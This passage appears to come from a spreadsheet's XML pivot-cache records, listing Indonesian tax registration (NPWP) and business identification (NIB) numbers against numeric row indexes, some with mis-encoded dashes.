    <x v="1704"/>
    <s v="npwp"/>
    <s v="70‚Äì039‚Äì424‚Äì0‚Äì603‚Äì000"/>
  </r>
  <r>
    <x v="1704"/>
    <s v="nib"/>
    <n v="8120000701137"/>
  </r>
  <r>
    <x v="1705"/>
    <s v="npwp"/>
    <s v="91‚Äì134‚Äì702‚Äì9‚Äì402‚Äì000"/>
  </r>
  <r>
    <x v="1705"/>
    <s v="nib"/>
    <n v="9120305430794"/>
  </r>
  <r>
    <x v="1706"/>
    <s v="npwp"/>
    <n v="676885528429000"/>
  </r>
  <r>
    <x v="1706"/>
    <s v="nib"/>
    <n v="9120002781312"/>
  </r>
  <r>
    <x v="1707"/>
    <s v="npwp"/>
    <s v="82‚Äì511‚Äì718‚Äì7‚Äì724‚Äì000"/>
  </r>
  <r>
    <x v="1707"/>
    <s v="nib"/>
    <n v="9120003823602"/>
  </r>
  <r>
    <x v="1708"/>
    <s v="npwp"/>
    <s v="01‚Äì799‚Äì709‚Äì9‚Äì904‚Äì000"/>
  </r>
  <r>
    <x v="1708"/>
    <s v="nib"/>
    <n v="8120106961024"/>
  </r>
  <r>
    <x v="1709"/>
    <s v="npwp"/>
    <s v="31‚Äì489‚Äì833‚Äì9‚Äì418‚Äì000"/>
  </r>
  <r>
    <x v="1709"/>
    <s v="nib"/>
    <n v="8120005703115"/>
  </r>
  <r>
    <x v="1710"/>
    <s v="npwp"/>
    <s v="01‚Äì588‚Äì366‚Äì3‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="1710"/>
    <s v="nib"/>
    <n v="9120101222614"/>
  </r>
  <r>
    <x v="1711"/>
    <s v="npwp"/>
    <s v="76‚Äì019‚Äì085‚Äì0‚Äì903‚Äì000"/>
  </r>
  <r>
    <x v="1711"/>
    <s v="nib"/>
    <n v="8120111132197"/>
  </r>
  <r>
    <x v="1712"/>
    <s v="npwp"/>
    <s v="82‚Äì897‚Äì815‚Äì5‚Äì608‚Äì000"/>
  </r>
  <r>
    <x v="1712"/>
    <s v="nib"/>
    <n v="9120001513414"/>
  </r>
  <r>
    <x v="1713"/>
    <s v="npwp"/>
    <s v="59‚Äì471‚Äì670‚Äì6‚Äì039‚Äì000"/>
  </r>
  <r>
    <x v="1713"/>
    <s v="nib"/>
    <n v="9120305510172"/>
  </r>
  <r>
    <x v="1714"/>
    <s v="npwp"/>
    <s v="03‚Äì183‚Äì089‚Äì6‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="1714"/>
    <s v="nib"/>
    <n v="8120014240548"/>
  </r>
  <r>
    <x v="1715"/>
    <s v="npwp"/>
    <s v="03‚Äì183‚Äì089‚Äì6‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="1715"/>
    <s v="nib"/>
    <n v="8120014240548"/>
  </r>
  <r>
    <x v="1716"/>
    <s v="npwp"/>
    <s v="01‚Äì000‚Äì065‚Äì1‚Äì051‚Äì000"/>
  </r>
  <r>
    <x v="1716"/>
    <s v="nib"/>
    <n v="9120200141153"/>
  </r>
  <r>
    <x v="1717"/>
    <s v="npwp"/>
    <s v="07‚Äì096‚Äì697‚Äì3‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="1717"/>
    <s v="nib"/>
    <n v="9120206810471"/>
  </r>
  <r>
    <x v="1718"/>
    <s v="npwp"/>
    <s v="92‚Äì133‚Äì878‚Äì6‚Äì418‚Äì000"/>
  </r>
  <r>
    <x v="1718"/>
    <s v="nib"/>
    <n v="9120201771764"/>
  </r>
  <r>
    <x v="1719"/>
    <s v="npwp"/>
    <s v="01‚Äì584‚Äì427‚Äì7‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1719"/>
    <s v="nib"/>
    <n v="9120212033808"/>
  </r>
  <r>
    <x v="1720"/>
    <s v="npwp"/>
    <s v="92‚Äì094‚Äì579‚Äì7‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1720"/>
    <s v="nib"/>
    <n v="9120309731916"/>
  </r>
  <r>
    <x v="1721"/>
    <s v="npwp"/>
    <s v="81‚Äì323‚Äì641‚Äì1‚Äì627‚Äì000"/>
  </r>
  <r>
    <x v="1721"/>
    <s v="nib"/>
    <n v="8120004972677"/>
  </r>
  <r>
    <x v="1722"/>
    <s v="npwp"/>
    <s v="25‚Äì081‚Äì499‚Äì3‚Äì642‚Äì000"/>
  </r>
  <r>
    <x v="1722"/>
    <s v="nib"/>
    <n v="8120212121557"/>
  </r>
  <r>
    <x v="1723"/>
    <s v="npwp"/>
    <s v="70‚Äì630‚Äì575‚Äì2‚Äì652‚Äì000"/>
  </r>
  <r>
    <x v="1723"/>
    <s v="nib"/>
    <n v="9120104862723"/>
  </r>
  <r>
    <x v="1724"/>
    <s v="npwp"/>
    <s v="92‚Äì457‚Äì262‚Äì1‚Äì435‚Äì000"/>
  </r>
  <r>
    <x v="1724"/>
    <s v="nib"/>
    <n v="9120305811652"/>
  </r>
  <r>
    <x v="1725"/>
    <s v="npwp"/>
    <s v="86‚Äì774‚Äì646‚Äì3‚Äì214‚Äì000"/>
  </r>
  <r>
    <x v="1725"/>
    <s v="nib"/>
    <n v="9120207342382"/>
  </r>
  <r>
    <x v="1726"/>
    <s v="npwp"/>
    <s v="91‚Äì312‚Äì107‚Äì5‚Äì214‚Äì000"/>
  </r>
  <r>
    <x v="1726"/>
    <s v="nib"/>
    <n v="9120101521943"/>
  </r>
  <r>
    <x v="1727"/>
    <s v="npwp"/>
    <s v="07‚Äì529‚Äì177‚Äì7‚Äì224‚Äì000"/>
  </r>
  <r>
    <x v="1727"/>
    <s v="nib"/>
    <n v="9120105910863"/>
  </r>
  <r>
    <x v="1728"/>
    <s v="npwp"/>
    <s v="90‚Äì726‚Äì274‚Äì5‚Äì921‚Äì000"/>
  </r>
  <r>
    <x v="1728"/>
    <s v="nib"/>
    <n v="9120009381857"/>
  </r>
  <r>
    <x v="1729"/>
    <s v="npwp"/>
    <s v="84‚Äì961‚Äì737‚Äì8‚Äì037‚Äì000"/>
  </r>
  <r>
    <x v="1729"/>
    <s v="nib"/>
    <n v="8120004762334"/>
  </r>
  <r>
    <x v="1730"/>
    <s v="npwp"/>
    <s v="81‚Äì645‚Äì550‚Äì5‚Äì723‚Äì000"/>
  </r>
  <r>
    <x v="1730"/>
    <s v="nib"/>
    <n v="9120008592175"/>
  </r>
  <r>
    <x v="1731"/>
    <s v="npwp"/>
    <s v="02‚Äì714‚Äì291‚Äì8‚Äì612‚Äì000"/>
  </r>
  <r>
    <x v="1731"/>
    <s v="nib"/>
    <n v="8120315002245"/>
  </r>
  <r>
    <x v="1732"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1732"/>
    <s v="nib"/>
    <n v="9120501802163"/>
  </r>
  <r>
    <x v="1733"/>
    <s v="npwp"/>
    <s v="06‚Äì156‚Äì557‚Äì8‚Äì921‚Äì000"/>
  </r>
  <r>
    <x v="1733"/>
    <s v="nib"/>
    <n v="9120206262"/>
  </r>
  <r>
    <x v="1734"/>
    <s v="npwp"/>
    <s v="02‚Äì268‚Äì003‚Äì0‚Äì615‚Äì000"/>
  </r>
  <r>
    <x v="1734"/>
    <s v="nib"/>
    <n v="8120107850022"/>
  </r>
  <r>
    <x v="1735"/>
    <s v="npwp"/>
    <s v="91‚Äì120‚Äì468‚Äì3‚Äì115‚Äì000"/>
  </r>
  <r>
    <x v="1735"/>
    <s v="nib"/>
    <n v="9120106450286"/>
  </r>
  <r>
    <x v="1736"/>
    <s v="npwp"/>
    <s v="07‚Äì856‚Äì305‚Äì3‚Äì604‚Äì000"/>
  </r>
  <r>
    <x v="1736"/>
    <s v="nib"/>
    <n v="9120601733213"/>
  </r>
  <r>
    <x v="1737"/>
    <s v="npwp"/>
    <s v="01‚Äì526‚Äì958‚Äì2‚Äì651‚Äì000"/>
  </r>
  <r>
    <x v="1737"/>
    <s v="nib"/>
    <n v="9120101602208"/>
  </r>
  <r>
    <x v="1738"/>
    <s v="npwp"/>
    <s v="31‚Äì810‚Äì467‚Äì6‚Äì643‚Äì000"/>
  </r>
  <r>
    <x v="1738"/>
    <s v="nib"/>
    <n v="8120216270976"/>
  </r>
  <r>
    <x v="1739"/>
    <s v="npwp"/>
    <s v="02‚Äì332‚Äì469‚Äì2‚Äì922‚Äì000"/>
  </r>
  <r>
    <x v="1739"/>
    <s v="nib"/>
    <n v="9120001611975"/>
  </r>
  <r>
    <x v="1740"/>
    <s v="npwp"/>
    <s v="74‚Äì257‚Äì834‚Äì7‚Äì657‚Äì001"/>
  </r>
  <r>
    <x v="1740"/>
    <s v="nib"/>
    <n v="91202074880225"/>
  </r>
  <r>
    <x v="1741"/>
    <s v="npwp"/>
    <s v="73‚Äì313‚Äì222‚Äì9‚Äì604‚Äì000"/>
  </r>
  <r>
    <x v="1741"/>
    <s v="nib"/>
    <n v="220002612978"/>
  </r>
  <r>
    <x v="1742"/>
    <s v="npwp"/>
    <s v="80‚Äì303‚Äì366‚Äì1‚Äì825‚Äì001"/>
  </r>
  <r>
    <x v="1742"/>
    <s v="nib"/>
    <n v="9120000912699"/>
  </r>
  <r>
    <x v="1743"/>
    <s v="npwp"/>
    <s v="31‚Äì805‚Äì411‚Äì1‚Äì618‚Äì000"/>
  </r>
  <r>
    <x v="1743"/>
    <s v="nib"/>
    <n v="9120308441902"/>
  </r>
  <r>
    <x v="1744"/>
    <s v="npwp"/>
    <s v="90‚Äì980‚Äì193‚Äì8‚Äì426‚Äì000"/>
  </r>
  <r>
    <x v="1744"/>
    <s v="nib"/>
    <n v="9120106652452"/>
  </r>
  <r>
    <x v="1745"/>
    <s v="npwp"/>
    <s v="84‚Äì655‚Äì129‚Äì9‚Äì412‚Äì000"/>
  </r>
  <r>
    <x v="1745"/>
    <s v="nib"/>
    <n v="8120007901038"/>
  </r>
  <r>
    <x v="1746"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1746"/>
    <s v="nib"/>
    <n v="9120101622563"/>
  </r>
  <r>
    <x v="1747"/>
    <s v="npwp"/>
    <s v="82‚Äì627‚Äì493‚Äì8‚Äì301‚Äì000"/>
  </r>
  <r>
    <x v="1747"/>
    <s v="nib"/>
    <n v="9120207342222"/>
  </r>
  <r>
    <x v="1748"/>
    <s v="npwp"/>
    <s v="90‚Äì344‚Äì688‚Äì8‚Äì306‚Äì000"/>
  </r>
  <r>
    <x v="1748"/>
    <s v="nib"/>
    <n v="9120001252256"/>
  </r>
  <r>
    <x v="1749"/>
    <s v="npwp"/>
    <s v="25‚Äì275‚Äì233‚Äì2‚Äì124‚Äì000"/>
  </r>
  <r>
    <x v="1749"/>
    <s v="nib"/>
    <n v="8120108981605"/>
  </r>
  <r>
    <x v="1750"/>
    <s v="npwp"/>
    <s v="81‚Äì900‚Äì450‚Äì8‚Äì604‚Äì000"/>
  </r>
  <r>
    <x v="1750"/>
    <s v="nib"/>
    <n v="8120006911784"/>
  </r>
  <r>
    <x v="1751"/>
    <s v="npwp"/>
    <s v="02‚Äì651‚Äì067‚Äì7‚Äì101‚Äì000"/>
  </r>
  <r>
    <x v="1751"/>
    <s v="nib"/>
    <n v="9120301921725"/>
  </r>
  <r>
    <x v="1752"/>
    <s v="npwp"/>
    <s v="76‚Äì348‚Äì835‚Äì0‚Äì914‚Äì000"/>
  </r>
  <r>
    <x v="1752"/>
    <s v="nib"/>
    <n v="9120102512584"/>
  </r>
  <r>
    <x v="1753"/>
    <s v="npwp"/>
    <s v="76‚Äì184‚Äì219‚Äì4‚Äì327‚Äì000"/>
  </r>
  <r>
    <x v="1753"/>
    <s v="nib"/>
    <n v="9120203920049"/>
  </r>
  <r>
    <x v="1754"/>
    <s v="npwp"/>
    <s v="84.596.107.7-124.000"/>
  </r>
  <r>
    <x v="1754"/>
    <s v="nib"/>
    <n v="8120310141492"/>
  </r>
  <r>
    <x v="1755"/>
    <s v="npwp"/>
    <s v="82‚Äì763‚Äì301‚Äì7‚Äì412‚Äì000"/>
  </r>
  <r>
    <x v="1755"/>
    <s v="nib"/>
    <n v="8120102722474"/>
  </r>
  <r>
    <x v="1756"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1756"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1757"/>
    <s v="npwp"/>
    <s v="41.032.726.6-915.000"/>
  </r>
  <r>
    <x v="1757"/>
    <s v="nib"/>
    <n v="1245000101494"/>
  </r>
  <r>
    <x v="1758"/>
    <s v="npwp"/>
    <s v="31‚Äì269‚Äì082‚Äì9‚Äì407‚Äì000"/>
  </r>
  <r>
    <x v="1758"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1759"/>
    <s v="npwp"/>
    <s v="76‚Äì487‚Äì979‚Äì7‚Äì101‚Äì000"/>
  </r>
  <r>
    <x v="1759"/>
    <s v="nib"/>
    <n v="9120101512381"/>
  </r>
  <r>
    <x v="1760"/>
    <s v="npwp"/>
    <s v="01‚Äì718‚Äì622‚Äì2‚Äì624‚Äì000"/>
  </r>
  <r>
    <x v="1760"/>
    <s v="nib"/>
    <n v="9120000681884"/>
  </r>
  <r>
    <x v="1761"/>
    <s v="npwp"/>
    <s v="14‚Äì521‚Äì836‚Äì8‚Äì101‚Äì000"/>
  </r>
  <r>
    <x v="1761"/>
    <s v="nib"/>
    <n v="8120011150938"/>
  </r>
  <r>
    <x v="1762"/>
    <s v="npwp"/>
    <s v="02‚Äì385‚Äì961‚Äì4‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="1762"/>
    <s v="nib"/>
    <n v="8120109832577"/>
  </r>
  <r>
    <x v="1763"/>
    <s v="npwp"/>
    <s v="70‚Äì643‚Äì278‚Äì8‚Äì311‚Äì000"/>
  </r>
  <r>
    <x v="1763"/>
    <s v="nib"/>
    <n v="8120003831554"/>
  </r>
  <r>
    <x v="1764"/>
    <s v="npwp"/>
    <s v="01‚Äì412‚Äì488‚Äì7‚Äì812‚Äì000"/>
  </r>
  <r>
    <x v="1764"/>
    <s v="nib"/>
    <n v="8120312051279"/>
  </r>
  <r>
    <x v="1765"/>
    <s v="npwp"/>
    <n v="259766129518000"/>
  </r>
  <r>
    <x v="1765"/>
    <s v="nib"/>
    <n v="9120205751272"/>
  </r>
  <r>
    <x v="1766"/>
    <s v="npwp"/>
    <s v="90‚Äì377‚Äì085‚Äì7‚Äì416‚Äì000"/>
  </r>
  <r>
    <x v="1766"/>
    <s v="nib"/>
    <n v="9120102340379"/>
  </r>
  <r>
    <x v="1767"/>
    <s v="npwp"/>
    <s v="93.976.039.3-809.000"/>
  </r>
  <r>
    <x v="1767"/>
    <s v="nib"/>
    <n v="220002122645"/>
  </r>
  <r>
    <x v="1768"/>
    <s v="npwp"/>
    <s v="81‚Äì843‚Äì192‚Äì6‚Äì309‚Äì001"/>
  </r>
  <r>
    <x v="1768"/>
    <s v="nib"/>
    <n v="9120109703404"/>
  </r>
  <r>
    <x v="1769"/>
    <s v="npwp"/>
    <s v="01‚Äì111‚Äì469‚Äì1‚Äì812‚Äì000"/>
  </r>
  <r>
    <x v="1769"/>
    <s v="nib"/>
    <n v="9120100370314"/>
  </r>
  <r>
    <x v="1770"/>
    <s v="npwp"/>
    <s v="32‚Äì297‚Äì674‚Äì9‚Äì614‚Äì001"/>
  </r>
  <r>
    <x v="1770"/>
    <s v="nib"/>
    <n v="9120105261432"/>
  </r>
  <r>
    <x v="1771"/>
    <s v="npwp"/>
    <s v="91‚Äì421‚Äì365‚Äì7‚Äì617‚Äì000"/>
  </r>
  <r>
    <x v="1771"/>
    <s v="nib"/>
    <n v="9120200572185"/>
  </r>
  <r>
    <x v="1772"/>
    <s v="npwp"/>
    <s v="74‚Äì244‚Äì720‚Äì4‚Äì611‚Äì000"/>
  </r>
  <r>
    <x v="1772"/>
    <s v="nib"/>
    <n v="8120119201316"/>
  </r>
  <r>
    <x v="1773"/>
    <s v="npwp"/>
    <s v="74‚Äì244‚Äì720‚Äì4‚Äì611‚Äì000"/>
  </r>
  <r>
    <x v="1773"/>
    <s v="nib"/>
    <n v="8120119201316"/>
  </r>
  <r>
    <x v="1774"/>
    <s v="npwp"/>
    <s v="02‚Äì009‚Äì744‚Äì0‚Äì604‚Äì000"/>
  </r>
  <r>
    <x v="1774"/>
    <s v="nib"/>
    <n v="8120001920549"/>
  </r>
  <r>
    <x v="1775"/>
    <s v="npwp"/>
    <s v="85‚Äì369‚Äì350‚Äì5‚Äì125‚Äì000"/>
  </r>
  <r>
    <x v="1775"/>
    <s v="nib"/>
    <n v="8120315120371"/>
  </r>
  <r>
    <x v="1776"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1777"/>
    <s v="npwp"/>
    <s v="90‚Äì559‚Äì672‚Äì2‚Äì201‚Äì000"/>
  </r>
  <r>
    <x v="1777"/>
    <s v="nib"/>
    <n v="9120006311257"/>
  </r>
  <r>
    <x v="1778"/>
    <s v="npwp"/>
    <s v="03‚Äì296‚Äì045‚Äì2‚Äì902‚Äì000"/>
  </r>
  <r>
    <x v="1778"/>
    <s v="nib"/>
    <n v="9120402231743"/>
  </r>
  <r>
    <x v="1779"/>
    <s v="npwp"/>
    <s v="26‚Äì464‚Äì283‚Äì2‚Äì009‚Äì000"/>
  </r>
  <r>
    <x v="1779"/>
    <s v="nib"/>
    <n v="8120213151462"/>
  </r>
  <r>
    <x v="1780"/>
    <s v="npwp"/>
    <s v="81‚Äì341‚Äì718‚Äì5‚Äì617‚Äì000"/>
  </r>
  <r>
    <x v="1780"/>
    <s v="nib"/>
    <n v="9120402830381"/>
  </r>
  <r>
    <x v="1781"/>
    <s v="npwp"/>
    <s v="81‚Äì341‚Äì718‚Äì5‚Äì617‚Äì000"/>
  </r>
  <r>
    <x v="1781"/>
    <s v="nib"/>
    <n v="9120402830381"/>
  </r>
  <r>
    <x v="1782"/>
    <s v="npwp"/>
    <s v="01‚Äì833‚Äì008‚Äì4‚Äì804‚Äì000"/>
  </r>
  <r>
    <x v="1782"/>
    <s v="nib"/>
    <n v="8120114241089"/>
  </r>
  <r>
    <x v="1783"/>
    <s v="npwp"/>
    <s v="01‚Äì845‚Äì554‚Äì3‚Äì404‚Äì000"/>
  </r>
  <r>
    <x v="1783"/>
    <s v="nib"/>
    <n v="8120116191042"/>
  </r>
  <r>
    <x v="1784"/>
    <s v="npwp"/>
    <s v="83‚Äì523‚Äì468‚Äì3‚Äì034‚Äì000"/>
  </r>
  <r>
    <x v="1784"/>
    <s v="nib"/>
    <n v="9120108511501"/>
  </r>
  <r>
    <x v="1785"/>
    <s v="npwp"/>
    <s v="02‚Äì460‚Äì958‚Äì8‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="1785"/>
    <s v="nib"/>
    <n v="9120003401614"/>
  </r>
  <r>
    <x v="1786"/>
    <s v="npwp"/>
    <n v="924230667031000"/>
  </r>
  <r>
    <x v="1786"/>
    <s v="nib"/>
    <n v="9120000870184"/>
  </r>
  <r>
    <x v="1787"/>
    <s v="npwp"/>
    <s v="70‚Äì194‚Äì886‚Äì1‚Äì911‚Äì000"/>
  </r>
  <r>
    <x v="1787"/>
    <s v="nib"/>
    <n v="9120414021405"/>
  </r>
  <r>
    <x v="1788"/>
    <s v="npwp"/>
    <s v="84‚Äì102‚Äì062‚Äì1‚Äì333‚Äì000"/>
  </r>
  <r>
    <x v="1788"/>
    <s v="nib"/>
    <n v="9120004902851"/>
  </r>
  <r>
    <x v="1789"/>
    <s v="npwp"/>
    <s v="16‚Äì416‚Äì384‚Äì2‚Äì331‚Äì000"/>
  </r>
  <r>
    <x v="1789"/>
    <s v="nib"/>
    <s v="IDM000820058"/>
  </r>
  <r>
    <x v="1790"/>
    <s v="npwp"/>
    <s v="92‚Äì568‚Äì581‚Äì0‚Äì122‚Äì000"/>
  </r>
  <r>
    <x v="1790"/>
    <s v="nib"/>
    <n v="9120106871398"/>
  </r>
  <r>
    <x v="1791"/>
    <s v="npwp"/>
    <s v="15‚Äì871‚Äì007‚Äì9‚Äì334‚Äì000"/>
  </r>
  <r>
    <x v="1791"/>
    <s v="nib"/>
    <n v="9120204901683"/>
  </r>
  <r>
    <x v="1792"/>
    <s v="npwp"/>
    <s v="87‚Äì343‚Äì271‚Äì0‚Äì809‚Äì000"/>
  </r>
  <r>
    <x v="1792"/>
    <s v="nib"/>
    <n v="9120005691284"/>
  </r>
  <r>
    <x v="1793"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1793"/>
    <s v="nib"/>
    <n v="9120105971501"/>
  </r>
  <r>
    <x v="1794"/>
    <s v="npwp"/>
    <s v="84‚Äì601‚Äì784‚Äì6‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="1794"/>
    <s v="nib"/>
    <n v="9120107111505"/>
  </r>
  <r>
    <x v="1795"/>
    <s v="npwp"/>
    <s v="87‚Äì011‚Äì674‚Äì6‚Äì201‚Äì000"/>
  </r>
  <r>
    <x v="1795"/>
    <s v="nib"/>
    <n v="9120201950662"/>
  </r>
  <r>
    <x v="1796"/>
    <s v="npwp"/>
    <s v="91‚Äì228‚Äì598‚Äì8‚Äì617‚Äì000"/>
  </r>
  <r>
    <x v="1796"/>
    <s v="nib"/>
    <n v="9120000581813"/>
  </r>
  <r>
    <x v="1797"/>
    <s v="npwp"/>
    <s v="90‚Äì617‚Äì229‚Äì1‚Äì201‚Äì000"/>
  </r>
  <r>
    <x v="1797"/>
    <s v="nib"/>
    <n v="9120201341729"/>
  </r>
  <r>
    <x v="1798"/>
    <s v="npwp"/>
    <s v="92‚Äì623‚Äì880‚Äì9‚Äì723‚Äì000"/>
  </r>
  <r>
    <x v="1798"/>
    <s v="nib"/>
    <n v="9120209922164"/>
  </r>
  <r>
    <x v="1799"/>
    <s v="npwp"/>
    <s v="91‚Äì587‚Äì023‚Äì2‚Äì648‚Äì000"/>
  </r>
  <r>
    <x v="1799"/>
    <s v="nib"/>
    <n v="9120004612586"/>
  </r>
  <r>
    <x v="1800"/>
    <s v="npwp"/>
    <s v="81‚Äì495‚Äì569‚Äì6‚Äì832‚Äì000"/>
  </r>
  <r>
    <x v="1800"/>
    <s v="nib"/>
    <n v="8120012100267"/>
  </r>
  <r>
    <x v="1801"/>
    <s v="npwp"/>
    <s v="72‚Äì203‚Äì433‚Äì7‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="1801"/>
    <s v="nib"/>
    <n v="8120003810573"/>
  </r>
  <r>
    <x v="1802"/>
    <s v="npwp"/>
    <s v="90‚Äì559‚Äì672‚Äì2‚Äì201‚Äì000"/>
  </r>
  <r>
    <x v="1802"/>
    <s v="nib"/>
    <n v="9120006311257"/>
  </r>
  <r>
    <x v="1803"/>
    <s v="npwp"/>
    <s v="86‚Äì147‚Äì636‚Äì4‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="1803"/>
    <s v="nib"/>
    <n v="8120312073116"/>
  </r>
  <r>
    <x v="1804"/>
    <s v="npwp"/>
    <s v="90‚Äì617‚Äì229‚Äì1‚Äì201‚Äì000"/>
  </r>
  <r>
    <x v="1804"/>
    <s v="nib"/>
    <n v="91202013411729"/>
  </r>
  <r>
    <x v="1805"/>
    <s v="npwp"/>
    <s v="02‚Äì276‚Äì406‚Äì2‚Äì215‚Äì000"/>
  </r>
  <r>
    <x v="1805"/>
    <s v="nib"/>
    <n v="9120006990513"/>
  </r>
  <r>
    <x v="1806"/>
    <s v="npwp"/>
    <s v="01‚Äì421‚Äì488‚Äì7‚Äì812‚Äì000"/>
  </r>
  <r>
    <x v="1806"/>
    <s v="nib"/>
    <n v="8120312051279"/>
  </r>
  <r>
    <x v="1807"/>
    <s v="npwp"/>
    <s v="76‚Äì843‚Äì627‚Äì1‚Äì214‚Äì000"/>
  </r>
  <r>
    <x v="1807"/>
    <s v="nib"/>
    <n v="9120409232766"/>
  </r>
  <r>
    <x v="1808"/>
    <s v="npwp"/>
    <s v="02‚Äì193‚Äì087‚Äì0‚Äì057‚Äì000"/>
  </r>
  <r>
    <x v="1808"/>
    <s v="nib"/>
    <n v="9120202141219"/>
  </r>
  <r>
    <x v="1809"/>
    <s v="npwp"/>
    <s v="02‚Äì638‚Äì777‚Äì9‚Äì955‚Äì001"/>
  </r>
  <r>
    <x v="1809"/>
    <s v="nib"/>
    <n v="8120312042393"/>
  </r>
  <r>
    <x v="1810"/>
    <s v="npwp"/>
    <s v="02‚Äì180‚Äì179‚Äì0‚Äì125‚Äì001"/>
  </r>
  <r>
    <x v="1810"/>
    <s v="nib"/>
    <n v="8120108860184"/>
  </r>
  <r>
    <x v="1811"/>
    <s v="npwp"/>
    <s v="75‚Äì124‚Äì598‚Äì6‚Äì125‚Äì000"/>
  </r>
  <r>
    <x v="1811"/>
    <s v="nib"/>
    <n v="9120200860095"/>
  </r>
  <r>
    <x v="1812"/>
    <s v="npwp"/>
    <s v="02‚Äì798‚Äì618‚Äì1‚Äì913‚Äì000"/>
  </r>
  <r>
    <x v="1812"/>
    <s v="nib"/>
    <n v="8120000800613"/>
  </r>
  <r>
    <x v="1813"/>
    <s v="npwp"/>
    <s v="83‚Äì310‚Äì079‚Äì5‚Äì301‚Äì000"/>
  </r>
  <r>
    <x v="1813"/>
    <s v="nib"/>
    <n v="9120007320789"/>
  </r>
  <r>
    <x v="1814"/>
    <s v="npwp"/>
    <s v="01‚Äì412‚Äì254‚Äì3‚Äì812‚Äì000"/>
  </r>
  <r>
    <x v="1814"/>
    <s v="nib"/>
    <n v="9120005172241"/>
  </r>
  <r>
    <x v="1815"/>
    <s v="npwp"/>
    <s v="02‚Äì798‚Äì618‚Äì1‚Äì913‚Äì000"/>
  </r>
  <r>
    <x v="1815"/>
    <s v="nib"/>
    <n v="8120000800613"/>
  </r>
  <r>
    <x v="1816"/>
    <s v="npwp"/>
    <s v="70‚Äì691‚Äì773‚Äì9‚Äì951‚Äì000"/>
  </r>
  <r>
    <x v="1816"/>
    <s v="nib"/>
    <n v="9120104120535"/>
  </r>
  <r>
    <x v="1817"/>
    <s v="npwp"/>
    <s v="70‚Äì691‚Äì773‚Äì9‚Äì951‚Äì000"/>
  </r>
  <r>
    <x v="1817"/>
    <s v="nib"/>
    <n v="9120104120535"/>
  </r>
  <r>
    <x v="1818"/>
    <s v="npwp"/>
    <s v="01‚Äì516‚Äì648‚Äì1‚Äì113‚Äì000"/>
  </r>
  <r>
    <x v="1818"/>
    <s v="nib"/>
    <n v="8120002742883"/>
  </r>
  <r>
    <x v="1819"/>
    <s v="npwp"/>
    <s v="80‚Äì494‚Äì769‚Äì5‚Äì501‚Äì000"/>
  </r>
  <r>
    <x v="1819"/>
    <s v="nib"/>
    <n v="9120019280845"/>
  </r>
  <r>
    <x v="1820"/>
    <s v="npwp"/>
    <s v="03‚Äì060‚Äì625‚Äì5‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="1820"/>
    <s v="nib"/>
    <n v="8120101950772"/>
  </r>
  <r>
    <x v="1821"/>
    <s v="npwp"/>
    <s v="01‚Äì923‚Äì378‚Äì2‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="1821"/>
    <s v="nib"/>
    <n v="9120206532435"/>
  </r>
  <r>
    <x v="1822"/>
    <s v="npwp"/>
    <s v="85‚Äì127‚Äì845‚Äì7‚Äì626‚Äì000"/>
  </r>
  <r>
    <x v="1823"/>
    <s v="nib"/>
    <n v="9120002612235"/>
  </r>
  <r>
    <x v="1824"/>
    <s v="npwp"/>
    <s v="16‚Äì509‚Äì739‚Äì5‚Äì814‚Äì000"/>
  </r>
  <r>
    <x v="1824"/>
    <s v="nib"/>
    <n v="9120109991338"/>
  </r>
  <r>
    <x v="1825"/>
    <s v="npwp"/>
    <s v="07‚Äì513‚Äì100‚Äì3‚Äì215‚Äì000"/>
  </r>
  <r>
    <x v="1825"/>
    <s v="nib"/>
    <n v="9120208632982"/>
  </r>
  <r>
    <x v="1826"/>
    <s v="npwp"/>
    <s v="02‚Äì268‚Äì035‚Äì9‚Äì723‚Äì000"/>
  </r>
  <r>
    <x v="1826"/>
    <s v="nib"/>
    <n v="8120111021183"/>
  </r>
  <r>
    <x v="1827"/>
    <s v="npwp"/>
    <s v="92‚Äì422‚Äì908‚Äì1‚Äì603‚Äì000"/>
  </r>
  <r>
    <x v="1827"/>
    <s v="nib"/>
    <n v="9120606832389"/>
  </r>
  <r>
    <x v="1828"/>
    <s v="npwp"/>
    <s v="14‚Äì639‚Äì494‚Äì5‚Äì223‚Äì000"/>
  </r>
  <r>
    <x v="1828"/>
    <s v="nib"/>
    <n v="8120119262709"/>
  </r>
  <r>
    <x v="1829"/>
    <s v="npwp"/>
    <s v="03‚Äì182‚Äì366‚Äì9‚Äì516‚Äì001"/>
  </r>
  <r>
    <x v="1829"/>
    <s v="nib"/>
    <n v="9120207270119"/>
  </r>
  <r>
    <x v="1830"/>
    <s v="npwp"/>
    <s v="86‚Äì526‚Äì480‚Äì8‚Äì223‚Äì000"/>
  </r>
  <r>
    <x v="1830"/>
    <s v="nib"/>
    <n v="9120205173806"/>
  </r>
  <r>
    <x v="1831"/>
    <s v="npwp"/>
    <s v="16‚Äì631‚Äì479‚Äì9‚Äì105‚Äì000"/>
  </r>
  <r>
    <x v="1831"/>
    <s v="nib"/>
    <n v="9120206130078"/>
  </r>
  <r>
    <x v="1832"/>
    <s v="npwp"/>
    <s v="92‚Äì795‚Äì014‚Äì7‚Äì618‚Äì000"/>
  </r>
  <r>
    <x v="1832"/>
    <s v="nib"/>
    <n v="9120105971501"/>
  </r>
  <r>
    <x v="1833"/>
    <s v="npwp"/>
    <s v="71‚Äì985‚Äì251‚Äì9‚Äì624‚Äì001"/>
  </r>
  <r>
    <x v="1833"/>
    <s v="nib"/>
    <n v="8120008881467"/>
  </r>
  <r>
    <x v="1834"/>
